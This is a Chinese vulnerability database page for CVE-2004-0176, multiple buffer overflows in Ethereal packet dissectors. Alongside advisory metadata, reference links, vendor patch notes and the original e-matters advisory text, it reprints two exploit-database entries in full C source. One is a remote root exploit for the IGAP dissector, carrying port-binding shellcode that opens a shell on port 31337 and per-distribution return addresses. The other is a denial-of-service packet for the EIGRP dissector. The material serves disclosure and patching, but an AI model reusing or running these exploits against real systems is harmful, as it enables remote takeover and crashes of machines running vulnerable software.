CVE-2004-0176
CVSS5.0
发布时间 :2004-05-04 00:00:00
修订时间 :2016-10-17 22:41:26
NMCOEPS    

[原文]Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.


[CNNVD]Ethereal多重漏洞(CNNVD-200405-037)

        Ethereal 0.8.13到0.10.2版本存在多个缓冲区溢出漏洞。远程攻击者借助(1) NetFlow,(2) IGAP,(3) EIGRP,(4) PGM, (5) IrDA,(6) BGP,(7) ISUP,或者(8) TCAP dissectors导致服务拒绝和可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ethereal_group:ethereal:0.8.19
cpe:/a:ethereal_group:ethereal:0.10.2
cpe:/a:ethereal_group:ethereal:0.10.1
cpe:/a:ethereal_group:ethereal:0.9.2
cpe:/a:ethereal_group:ethereal:0.9.1
cpe:/a:ethereal_group:ethereal:0.9.10
cpe:/a:ethereal_group:ethereal:0.9.6
cpe:/a:ethereal_group:ethereal:0.9.11
cpe:/a:ethereal_group:ethereal:0.9.5
cpe:/a:ethereal_group:ethereal:0.9.4
cpe:/a:ethereal_group:ethereal:0.10
cpe:/a:ethereal_group:ethereal:0.9.3
cpe:/a:ethereal_group:ethereal:0.8.13
cpe:/a:ethereal_group:ethereal:0.9.14
cpe:/a:ethereal_group:ethereal:0.8.14
cpe:/a:ethereal_group:ethereal:0.9.15
cpe:/a:ethereal_group:ethereal:0.9.9
cpe:/a:ethereal_group:ethereal:0.9.12
cpe:/a:ethereal_group:ethereal:0.9.8
cpe:/a:ethereal_group:ethereal:0.9
cpe:/a:ethereal_group:ethereal:0.9.13
cpe:/a:ethereal_group:ethereal:0.9.7
cpe:/a:ethereal_group:ethereal:0.8.18
cpe:/a:ethereal_group:ethereal:0.9.16

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:887Multiple BO Vulnerabilities in Red Hat Enterprise 3 Ethereal
oval:org.mitre.oval:def:878Multiple BO Vulnerabilities in Red Hat Ethereal
oval:org.mitre.oval:def:10187Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary co...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0176
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0176
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200405-037
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835
(UNKNOWN)  CONECTIVA  CLA-2004:835
http://marc.info/?l=bugtraq&m=108007072215742&w=2
(UNKNOWN)  BUGTRAQ  20040323 Advisory 03/2004: Multiple (13) Ethereal remote overflows
http://marc.info/?l=bugtraq&m=108058005324316&w=2
(UNKNOWN)  BUGTRAQ  20040329 LNSA-#2004-0007: Multiple security problems in Ethereal
http://marc.info/?l=bugtraq&m=108213710306260&w=2
(UNKNOWN)  BUGTRAQ  20040416 [OpenPKG-SA-2004.015] OpenPKG Security Advisory (ethereal)
http://security.e-matters.de/advisories/032004.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/032004.html
http://security.gentoo.org/glsa/glsa-200403-07.xml
(UNKNOWN)  GENTOO  GLSA-200403-07
http://www.debian.org/security/2004/dsa-511
(VENDOR_ADVISORY)  DEBIAN  DSA-511
http://www.ethereal.com/appnotes/enpa-sa-00013.html
(UNKNOWN)  CONFIRM  http://www.ethereal.com/appnotes/enpa-sa-00013.html
http://www.kb.cert.org/vuls/id/119876
(UNKNOWN)  CERT-VN  VU#119876
http://www.kb.cert.org/vuls/id/125156
(UNKNOWN)  CERT-VN  VU#125156
http://www.kb.cert.org/vuls/id/433596
(UNKNOWN)  CERT-VN  VU#433596
http://www.kb.cert.org/vuls/id/591820
(UNKNOWN)  CERT-VN  VU#591820
http://www.kb.cert.org/vuls/id/644886
(UNKNOWN)  CERT-VN  VU#644886
http://www.kb.cert.org/vuls/id/659140
(UNKNOWN)  CERT-VN  VU#659140
http://www.kb.cert.org/vuls/id/740188
(UNKNOWN)  CERT-VN  VU#740188
http://www.kb.cert.org/vuls/id/864884
(UNKNOWN)  CERT-VN  VU#864884
http://www.kb.cert.org/vuls/id/931588
(UNKNOWN)  CERT-VN  VU#931588
http://www.mandriva.com/security/advisories?name=MDKSA-2004:024
(UNKNOWN)  MANDRAKE  MDKSA-2004:024
http://www.redhat.com/support/errata/RHSA-2004-136.html
(UNKNOWN)  REDHAT  RHSA-2004:136
http://www.redhat.com/support/errata/RHSA-2004-137.html
(UNKNOWN)  REDHAT  RHSA-2004:137
http://xforce.iss.net/xforce/xfdb/15569
(VENDOR_ADVISORY)  XF  ethereal-multiple-dissectors-bo(15569)

- 漏洞信息

Ethereal多重漏洞
中危 缓冲区溢出
2004-05-04 00:00:00 2005-10-20 00:00:00
远程※本地  
        Ethereal 0.8.13到0.10.2版本存在多个缓冲区溢出漏洞。远程攻击者借助(1) NetFlow,(2) IGAP,(3) EIGRP,(4) PGM, (5) IrDA,(6) BGP,(7) ISUP,或者(8) TCAP dissectors导致服务拒绝和可能执行任意代码。

- 公告与补丁

        The vendor has released version 0.10.3 to address these issues.
        SGI have released an advisory (20040402-01-U) and a patch to address these issues in SGI ProPack version 2.3 and 2.4. The vendor has advised that customers apply this patch as soon as possible. Further details regarding obtaining and applying an appropriate patch can be found in the referenced advisory. Patch is linked below.
        Gentoo have released an advisory (GLSA 200403-07) and updates to address these issues. Gentoo users are advised to upgrade to current packages by emerging the updated packages as follows:
        # emerge sync
        # emerge -pv ">=net-analyzer/ethereal-0.10.3"
        # emerge ">=net-analyzer/ethereal-0.10.3"
        Netwosix Linux has released advisory LNSA-#2004-0007 dealing with these issues. Please see the referenced advisory for more information.
        RedHat Enterprise Linux has released advisory RHSA-2004:136-09 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.
        RedHat has released advisory RHSA-2004:137-01 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.
        Mandrake has released an advisory that includes updates for this issue.
        Conectiva has released an advisory CLSA-2004:835 to address these issues. Please see the advisory in web references for more details.
        OpenPKG has released advisory OpenPKG-SA-2004.015 and an update dealing with this issue. Please see below for the update, and the referenced advisory for more information.
        SGI has released an advisory (20040506-01-U) with Patch 10075 for SGI
        ProPack 3 to address these and other issues. Please see the referenced
        advisory for more information.
        Debian has released advisory DSA 511-1 to address this issue. It is noted that CAN-2004-0176 partially affects Debian woody and CAN-2004-0367/CAN-2004-0365 do not affect the distribution at all. Please see the attached advisory for more details on obtaining fixes.
        RedHat has released a Fedora legacy advisory (FLSA:1840) to address various issues in Ethereal. This advisory fixes these issues in Red Hat Linux 7.3 and 9 running on the i386 architecture. Please see the referenced advisory for more details and information about obtaining fixes.
        Ethereal Group Ethereal 0.10
        
        Ethereal Group Ethereal 0.10.1
        
        Ethereal Group Ethereal 0.10.2
        
        Ethereal Group Ethereal 0.8.13
        
        Ethereal Group Ethereal 0.8.14
        
        Ethereal Group Ethereal 0.8.18
        
        Ethereal Group Ethereal 0.8.19
        
        Ethereal Group Ethereal 0.9
        
        Ethereal Group Ethereal 0.9.1
        
        Ethereal Group Ethereal 0.9.10
        
        Ethereal Group Ethereal 0.9.11
        
        Ethereal Group Ethereal 0.9.12
        
        Ethereal Group Ethereal 0.9.13
        
        Ethereal Group Ethereal 0.9.14
        
        Ethereal Group Ethereal 0.9.15
        
        Ethereal Group Ethereal 0.9.16
        
        Ethereal Group Ethereal 0.9.2
        

- 漏洞信息 (167)

Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit (EDBID:167)
linux remote
2004-03-28 Verified
0 Abhisek Datta
N/A [点击下载]
/* 
 * THE EYE ON SECURITY RESEARCH GROUP - INDIA
 * Ethereal IGAP Dissector Message Overflow Remote Root exploit
 *
 * Copyright 2004 - EOS-India Group
 *
 * Authors note:
 * Shellcode splitting technique:
 * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
 * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
 * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
 * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode 
 * requires EBP to contain a usuable stack address, we overwrite saved EBP also.
 *
 * Disclaimer:
 * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
 * be held responsible for any damage caused due to misuse of this code.
 * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
 * Ethereal 0.10.2.
 *
 * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
 * http://www.eos-india.net
 *
*/
#define IPPROTO_IGAP	0x02 // IPPROTO_IGMP=0x02 	
#define PAYLOAD_SIZE	(255-64)	
#define MAX_BUFF	sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP		"Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER		"0.2"
#define SOCKET_ERROR	-1
#define MAX_PACKET	10
#define RETOFFSET 	76 
#define SRC_IP		"192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>

#define MAX_ARCH	5
struct eos{
	char *arch;
	unsigned long ret;
} targets[] = {
	"tEthereal(0.10.2)-Gentoo(gdb)",
	0xbffede50,
	//-------------------------------
	"tEthereal(0.10.2)-Gentoo     ",
	0xbffede10,
	//-------------------------------
	"Ethereal(0.10.2)-Gentoo      ",
	0xbfffd560,
	//-------------------------------
	"tEthereal(0.10.2)-RedHat 8   ",
	0xbffedfb8,
	//-------------------------------
	"Ethereal(0.10.2)-RedHat 8    ",
	0xbfffcd08,
	//-------------------------------
	NULL,
	0
};
	

/*
 x86 linux portbind a shell in port 31337
 based on shellcode from www.shellcode.com.ar
 with a few modifications by us
*/
 
char shellcode_firsthalf[]=
        /* sys_fork() */
	"\x31\xc0"                      // xorl         %eax,%eax
	"\x31\xdb"                      // xorl         %ebx,%ebx
	"\xb0\x02"                      // movb         $0x2,%al
	"\xcd\x80"                      // int          $0x80
	"\x38\xc3"                      // cmpl         %ebx,%eax
	"\x74\x05"                      // je           0x5
	/* sys_exit() */
	"\x8d\x43\x01"                  // leal         0x1(%ebx),%eax
	"\xcd\x80"                      // int          $0x80
        /* setuid(0) */
        "\x31\xc0"                      // xorl         %eax,%eax
        "\x31\xdb"                      // xorl         %ebx,%ebx
        "\xb0\x17"                      // movb         $0x17,%al
        "\xcd\x80"                      // int          $0x80
        /* socket() */
        "\x31\xc0"                      // xorl    %eax,%eax
        "\x89\x45\x10"                  // movl    %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
        "\x40"                          // incl    %eax
        "\x89\xc3"                      // movl    %eax,%ebx(SYS_SOCKET = 0x1)
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
        "\x40"                          // incl    %eax
        "\x89\x45\x08"                  // movl    %eax,0x8(%ebp)(AF_INET = 0x2)
	"\x8d\x4d\x08"                  // leal    0x8(%ebp),%ecx
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
        "\x89\x45\x08"                  // movl    %eax,0x8(%ebp)
	;	
char jumpcode[]="\xeb\x10";

char shellcode_secondhalf[]=
        /* bind()*/
        "\x43"                          // incl    %ebx(SYS_BIND = 0x2)
        "\x66\x89\x5d\x14"              // movw    %bx,0x14(%ebp)(AF_INET = 0x2)
	"\x66\xc7\x45\x16\x7a\x69"      // movw    $0x697a,0x16(%ebp)(port=31337)
        "\x31\xd2"                      // xorl    %edx,%edx
        "\x89\x55\x18"                  // movl    %edx,0x18(%ebp)
        "\x8d\x55\x14"                  // leal    0x14(%ebp),%edx
        "\x89\x55\x0c"                  // movl    %edx,0xc(%ebp)
        "\xc6\x45\x10\x10"              // movb    $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
 
        /* listen() */
        "\x40"                          // incl    %eax
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)
        "\x43"                          // incl    %ebx
        "\x43"                          // incl    %ebx(SYS_LISTEN = 0x4)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
 
        /* accept() */
        "\x43"                          // incl    %ebx
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)
        "\x89\x45\x10"                  // movl    %eax,0x10(%ebp)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
        "\x89\xc3"                      // movl    %eax,%ebx
 
        /* dup2() */
        "\x31\xc9"                      // xorl    %ecx,%ecx
        "\xb0\x3f"                      // movb    $0x3f,%al
        "\xcd\x80"                      // int     $0x80
        "\x41"                          // incl    %ecx
        "\x80\xf9\x03"                  // cmpb    $0x3,%cl
        "\x75\xf6"                      // jne     -0xa
 
        /* execve() */
        "\x31\xd2"                      // xorl    %edx,%edx
        "\x52"                          // pushl   %edx
        "\x68\x6e\x2f\x73\x68"          // pushl   $0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // pushl   $0x69622f2f
        "\x89\xe3"                      // movl    %esp,%ebx
        "\x52"                          // pushl   %edx
        "\x53"                          // pushl   %ebx
        "\x89\xe1"                      // movl    %esp,%ecx
        "\xb0\x0b"                      // movb    $0xb,%al
        "\xcd\x80";                     // int     $0x80
 
struct ipheader {
	unsigned char ip_hl:4, ip_v:4; 
	unsigned char ip_tos;
	unsigned short int ip_len;
	unsigned short int ip_id;
	unsigned short int ip_off;
	unsigned char ip_ttl;
	unsigned char ip_proto;
	unsigned short int ip_sum;
	unsigned int ip_src;
	unsigned int ip_dst;
};

struct igap_header { 		// This is a malformed header which does not conforms with IGAP RFC
	unsigned char igap_type; 	// Message Type
	unsigned char igap_restime; 	// Response Time
	unsigned short int igap_cksum; 	// IGAP Message Checksum
	unsigned int igap_gaddr; 	// Group Address
	unsigned char igap_ver; 	// Version
	unsigned char igap_stype;	// SubType
	unsigned char igap_reserved1;	// Reserved
	unsigned char igap_cid;		// Challenge ID
	unsigned char igap_asize;	// Account Size
	unsigned char igap_msgsize;	// Message Size
	unsigned short int igap_reserved2;	// Reserved
	/*
	unsigned char igap_uaccount[16];// User Account
	unsigned char igap_message[64]	// Message
	*/
	unsigned char igap_payload[16+64+PAYLOAD_SIZE];	
// This buffer will contain payload, here we differ from RFC by sending a bigger message.
};

unsigned short checksum(unsigned short *buf,int nwords)
{
	unsigned long sum;
	for (sum = 0; nwords > 0; nwords--)
		sum += *(buf)++;
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	return ~sum;
}

void showhelp(char *pr00gie) {
	int i=0;
	printf("######### The Eye on Security Research Group - India ########\n");
	printf("%s %s\n",EXP,VER);
       	printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n");
       	printf("http://www.eos-india.net\n\n");
	printf("[usage]\n");
	printf("%s [Remote Host] [Target]\n",pr00gie);
	printf("[Available Targets]\n");
	while(targets[i].arch != NULL) {
		printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret);
		i++;
	}
	exit(1); 
}
	      
int main(int argc,char *argv[]) {
	char buffer[MAX_BUFF];
	struct ipheader *iphdr=(struct ipheader*)buffer;
	struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));
	int sockfd;
	unsigned long addr;
	int one=1;
	int i;
	const int *val=&one;
	struct sockaddr_in sin;
	unsigned long magic;
	unsigned int n;
	
	if(getuid()) {
		printf("- This code opens SOCK_RAW which needs root privilege\n");
		exit(1);
	}
	if(argc != 3)
		showhelp(argv[0]);
	n=atoi(argv[2]);
	if(n >= MAX_ARCH) {
		printf("- Invalid target\n");
		showhelp(argv[0]);
	}
	magic=targets[n].ret;
	printf("-Using RET %p\n",magic);
	addr=inet_addr(argv[1]);
	if(addr==INADDR_NONE) {
		printf("- Invalid target\n");
		exit(1);
	}
	sin.sin_addr.s_addr=addr;
	sin.sin_family=AF_INET;
	sin.sin_port=0x00;
	sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
	if(sockfd==SOCKET_ERROR) {
		printf("- Failed creating SOCK_RAW descriptor\n");
		exit(1);
	}
	if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)
		printf ("- WARNING !! :Cannot set IP_HDRINCL!\n");
	memset(buffer,0x00,MAX_BUFF);
	// Filling IP Header
	iphdr->ip_hl=0x05;
	iphdr->ip_v=0x04;
	iphdr->ip_tos=0x00;
	iphdr->ip_len=MAX_BUFF;
	iphdr->ip_id=htonl(54321);
	iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset
	iphdr->ip_ttl=0x01;
	iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP
	iphdr->ip_sum=0x00; // Fill sum before sending packet
	iphdr->ip_src=inet_addr (SRC_IP); 
	iphdr->ip_dst=addr;
	// Filling IGAP Header
	igaphdr->igap_type=0x41; // IGAP Membership Query
	igaphdr->igap_restime=0x0a; // 
	igaphdr->igap_cksum=0x00; // compute before sending packet
	igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message
	igaphdr->igap_ver=0x01; // IGAPv1
	igaphdr->igap_stype=0x21; // Basic Query
	igaphdr->igap_reserved1=0x00; // Ignored
	igaphdr->igap_cid=0x00; 
	// Challenge ID (ignored because Chanllenge Response authentication not used)		
	igaphdr->igap_asize=0x10; // MAX Size of Account Name Field
	igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; //  Size of Message	
	igaphdr->igap_reserved2=0x00; // Reserved
	// Building exploit buffer
	//for(i=0;i<16+64+PAYLOAD_SIZE;i++)
	//	memset(igaphdr->igap_payload+i,(unsigned char)i,1);
	memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);
	memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,
	strlen(shellcode_firsthalf));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);
	magic-=0x10;
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);
	memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,
                shellcode_secondhalf,strlen(shellcode_secondhalf));
	// Calculating checksum
	igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),
	(sizeof(struct igap_header))>>1);
	iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);
	// Sending
	one=MAX_PACKET;
	while(one) {
		sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));
		printf(".");
		one--;
	}
	close(sockfd); 
	printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);	
	printf("- Read source to know what to do to check if the exploit worked\n");
	return 0;
}

// milw0rm.com [2004-03-28]
		

- 漏洞信息 (170)

Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit (EDBID:170)
multiple dos
2004-03-26 Verified
0 Rémi Denis-Courmont
N/A [点击下载]
/*
 * Ethereal network protocol analyzer
 * EIGRP Dissector TLV_IP_INT Long IP Address Overflow
 * vulnerability
 * proof of concept code
 * version 1.0 (Mar 26 2004)
 *
 * by R&#65533;mi Denis-Courmont < ethereal at simphalampin dot com >
 *   www simphalempin com dev 
 *
 * This vulnerability was found by:
 *   Stefan Esser s.esser e-matters de
 * whose original advisory may be fetched from:
 *   security e-matters de advisories 032004.html
 *
 * Vulnerable:
 *  - Ethereal v0.10.2
 *
 * Not vulnerable:
 *  - Ethreal v0.10.3
 *
 * Note: this code will simply trigger a denial of service on Ethereal.
 * It should really be possible to exploit the buffer overflow
 * (apparently up to 29 bytes overflow), but I haven't tried.
 */


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>

static const char packet[] =
        "\x01" /* Version */
        "\x04" /* Opcode: Reply */
        "\x00\x00" /* Checksum (invalid) */
        "\x00\x00\x00\x00" /* Flags */
        "\x00\x00\x00\x00" /* Sequence number */
        "\x00\x00\x00\x00" /* ACK */
        "\x00\x00\x00\x00" /* AS number */

        /* IP internal routes TLV */
        "\x01\x02" /* Type */
        "\x00\x39" /* Length (should be 0x1C) */
        "\x00\x00\x00\x00" /* Next hop */
        "\x00\x00\x00\x00" /* Delay */
        "\x00\x00\x00\x00" /* Bandwitdh */
        "\x00\x00\x00" /* MTU */
        "\x00" /* Hop count: directly connected */
        "\xff" /* Reliability: maximum */
        "\x01" /* Load: minimum */
        "\x00\x00" /* Reserved */
        "\xff" /* Prefix length: should be > 0 and <= 32 */
        "\x00\x00\x00" /* Destination network */
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff\xff\xff\xff"
        "\xff\xff\xff\xff" "\xff" /* buffer overflow */
;


static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;

        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }

        len = sizeof (packet) - 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }

        puts ("Packet sent!");
        close (fd);
        return 0;
}


static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
        return 2;
}


int
main (int argc, char *argv[])
{
        struct sockaddr *dest;

        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflow\n"
                "proof of concept code\n"
                "Copyright (C) 2004 R<E9>mi Denis-Courmont "
                "<\x65\x74\x68\x65\x72\x65\x61\x6c\x40\x73\x69\x6d\x70"
                "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");


        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;

                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;

                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %s\n", argv[1],
                                        gai_strerror (check));
                        return 1;
                }

                dest = res->ai_addr;
        }

        return proof ((const struct sockaddr_in *)dest);
}		

- 漏洞信息 (F32937)

032004.txt (PacketStormID:F32937)
2004-03-24 00:00:00
Stefan Esser  security.e-matters.de
advisory,remote,overflow,arbitrary,code execution
CVE-2004-0176
[点击下载]

Ethereal versions 0.8.14 through 0.10.2 were found to be vulnerable to thirteen remote stack overflows during a code audit. The vulnerable dissectors in question are namely: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP. Ten of the overflows allow for arbitrary code execution.

e-matters GmbH
                          www.e-matters.de

                      -= Security  Advisory =-



     Advisory: Multiple (13) Ethereal remote overflows
 Release Date: 2004/03/23
Last Modified: 2004/03/23
       Author: Stefan Esser [s.esser@e-matters.de]

  Application: Ethereal 0.8.14 - 0.10.2
     Severity: 13 remotely triggerable vulnerabilities were 
               discovered in the multiprotocol packet sniffer 
               Ethereal that allow remote compromise
         Risk: Critical
Vendor Status: Plans to release a fixed version within this week
    Reference: http://security.e-matters.de/advisories/032004.html


Overview:

   Quote from http://www.ethereal.com
   
   "Ethereal is used by network professionals around the world for 
   troubleshooting, analysis, software and protocol development, and 
   education. It has all of the standard features you would expect in 
   a protocol analyzer, and several features not seen in any other 
   product. Its open source license allows talented experts in the 
   networking community to add enhancements. It runs on all popular 
   computing platforms, including Unix, Linux, and Windows."
   
   During a code audit of Ethereal thirteen remotely triggerable stack-
   overflows where discovered. The vulnerable dissectors in question
   are namely: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP.
   
   With the exception of 3 all discovered overflows allow arbitrary code
   execution by injecting carefully crafted packets to the sniffed wire
   or by convincing someone to load a malicious packet capture file into
   Ethereal.
   
      
Details:

   In the beginning of March a code audit of Ethereal revealed remotely
   triggerable overflows within a few of the over 400 dissectors. During
   the process of working with the Ethereal vendor the audit continued 
   and until today it was possible to identify a total count of 13 
   possible stack overflows within 9 different dissectors. 
   
   For the purpose of clarity it was choosen to describe all these bugs
   within this advisory instead of spreading the information over nine
   single advisories.
   
   Because the defects affect different parts of the code base and
   were introduced at different dates within the last 3 years the
   following table gives a short overview of the exact CVS commit
   timestamps and the version number it first appeared in.
   
   (Version 0.8.14)
   
   
   [04] EIGRP Dissector TLV_IP_INT Long IP Address Overflow
        - Revision: 1.7, Thu Nov 9 05:16:19 2000 UTC
   
   [05] EIGRP Dissector TLV_IP_EXT Long IP Address Overflow
        - Revision: 1.7, Thu Nov 9 05:16:19 2000 UTC
   
   
   (version 0.8.19)
   
   [06] PGM Dissector NakList Overflow
        - Revision: 1.1, Thu Jul 12 20:16:28 2001 UTC
   
   
   (version 0.9.0)
   
   [11] UCP Dissector Handle String-Field Overflow
        - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC
   
   [12] UCP Dissector Handle Int-Field Overflow
        - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC
   
   [13] UCP Dissector Handle Time-Field Overflow
        - Revision: 1.1, Mon Oct 8 17:30:23 2001 UTC
   
   
   (version 0.9.10)
   
   [01] Netflow v9 Dissector Template Caching Overflow
        - Revision 1.9 Tue Mar 4 03:37:12 2003 UTC
   
   
   (version 0.9.16)
   
   [09] ISUP Dissector INTERWORKING FUNCTION ADDRESS Overflow
        - Revision: 1.29, Fri Oct 3 20:58:13 2003 UTC
   
   [10] TCAP Dissector TID Overflow
        - Revision: 1.1, Thu Oct 2 06:13:28 2003 UTC
   
   
   (version 0.10.0)
   
   [02] IGAP Dissector Account Overflow 
        - Revision 1.1 Wed Dec 10 19:21:55 2003 UTC
   
   [03] IGAP Dissector Message Overflow 
        - Revision 1.1 Wed Dec 10 19:21:55 2003 UTC
   
   
   (version 0.10.1)
   
   [08] BGP Dissector MPLS Label Overflow
        - Revision: 1.84, Tue Jan 6 02:29:36 2004 UTC
   
   [07] IRDA Dissector Plugin IRCOM_PORT_NAME Overflow
        - Revision: 1.1, Thu Dec 18 19:07:12 2003 UTC
   
   
   
   In the following paragraphs all 13 bugs are described in a
   short form. The referenced URL within the header of this advisory
   will be updated with more detailed information (incl. snippets)
   when the Ethereal developers have released 0.10.3.

   
   [01] NetFlow v9 Dissector Template Caching Overflow
   ---------------------------------------------------
   
   Desc: When parsing the v9_template structure within a NetFlow
         UDP packet a template_entry count > 64 will overflow
         a stackbuffer and allows overwriting the saved instruction
         pointer, thus allowing remote code execution.


   [02] IGAP Protocol Dissector Account Overflow
   [03] IGAP Protocol Dissector Message Overflow
   ---------------------------------------------
   
   Desc: When parsing an IGAP protocol packet that contains either 
         an overlong accountname (>17) or an overlong message (>65)
         different buffers may overflow the stack, allowing an over-
         write of up to 238 (or 190) bytes. In both cases remote 
         code execution exploitation is possible.


   [04] EIGRP Protocol TLV_IP_INT Long IP Address Overflow
   -------------------------------------------------------

   Desc: When parsing an EIGRP IP packet that contains an overlong
         IP address this will overflow a stack buffer and therefore can
         lead to remote code execution

  
   [05] EIGRP Protocol TLV_IP_EXT Long IP Address Overflow
   -------------------------------------------------------

   Desc: When parsing an EIGRP Extended IP packet that contains an 
         overlong extended IP address this will overflow a stack buffer 
         and can lead to remote code execution


   [06] PGM Protocol NakList Overflow
   ----------------------------------

   Desc: When parsing an PGM packet with a carefully crafted NakList
         a possible integer underflow can result in a very small stack-
         overflow. Due to the stacklayout code execution exploitation
         seems very unlikely.


   [07] IRDA Protocol Plugin IRCOM_PORT_NAME Overflow
   --------------------------------------------------

   Desc: When parsing an IRCOM_PORT_NAME packed an overlong portname 
         can overwrite up to 2 bytes on the stack. Similar to [06] the
         stacklayout seems to make remote code execution very difficult
         or impossible.
	

   [08] BGP Protocol MPLS Label Overflow
   -------------------------------------
   
   Desc: When parsing a BGP Packet with a MPLS IPv6 label up to 13 
         bytes on the stack may be overwritten with arbitrary data.
         Due to the stacklayout exploitability seems unlikly and was
         therefore not tested.
      

   [09] ISUP Protocol INTERWORKING FUNCTION ADDRESS Overflow
   ---------------------------------------------------------

   Desc: When parsing an ISUP Packet an oversized IWFA will overflow 
         a stack buffer and can lead to remote code execution


   [10] TCAP Protocol TID Overflow
   -------------------------------
   
   Desc: When handling the ASN.1 encoded Transaction ID within a TCAP
         packet a 4 byte stack variable may overflow and can lead to
         remote code execution


   [11] UCP Protocol Handle String-Field Overflow
   ----------------------------------------------
   
   Desc: When handling a string within an UCP packet a stack buffer 
         of BUFSIZ bytes may overflow and can therefore lead to 
         remote code execution.
         To exploit this vulnerability over the wire an attacker must 
         be able to fit more than BUFSIZ bytes into one TCP packet.
         This means it is only exploitable on the wire if the system
         has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc 
         systems, 1024 on BSD systems and 512 on Windows systems.


